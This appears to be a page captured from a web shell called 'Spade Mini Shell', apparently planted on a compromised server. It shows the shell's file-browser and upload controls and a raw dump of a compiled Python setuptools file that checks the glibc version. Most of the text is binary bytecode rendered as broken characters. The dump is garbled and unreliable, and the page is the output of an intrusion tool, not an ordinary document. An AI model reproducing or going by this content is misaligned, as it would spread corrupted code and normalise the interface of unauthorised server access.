Spade

Mini Shell

Directory:~$ /lib/python3.6/site-packages/setuptools/__pycache__/
Upload File

[Home] [System Details] [Kill Me]
Current File:~$ //lib/python3.6/site-packages/setuptools/__pycache__/glibc.cpython-36.opt-1.pyc

3

J$�\J�@sHddlmZddlZddlZddlZdd�Zdd�Zdd�Zd	d
�ZdS)�)�absolute_importNcCsPtjd�}y
|j}Wntk
r(dSXtj|_|�}t|t�sL|jd�}|S)z9Returns glibc version
string, or None if not using
glibc.N�ascii)	�ctypesZCDLL�gnu_get_libc_version�AttributeErrorZc_char_pZrestype�
isinstance�str�decode)Zprocess_namespacer�version_str�r�/usr/lib/python3.6/glibc.py�glibc_version_string
s



r
cCsHtjd|�}|s$tjd|t�dSt|jd��|koFt|jd��|kS)Nz$(?P<major>[0-9]+)\.(?P<minor>[0-9]+)z=Expected
glibc version with 2 components major.minor, got:
%sF�major�minor)�re�match�warnings�warn�RuntimeWarning�int�group)r
�required_major�
minimum_minor�mrrr�check_glibc_version$s
rcCst�}|dkrdSt|||�S)NF)r
r)rrr
rrr�have_compatible_glibc4srcCst�}|dkrdSd|fSdS)z�Try
to determine the glibc version

    Returns a tuple of strings (lib, version) which default to empty
strings
    in case the lookup fails.
    N�Zglibc)rr)r
)Z
glibc_versionrrr�libc_verLsr)	Z
__future__rrrrr
rrrrrrr�<module>s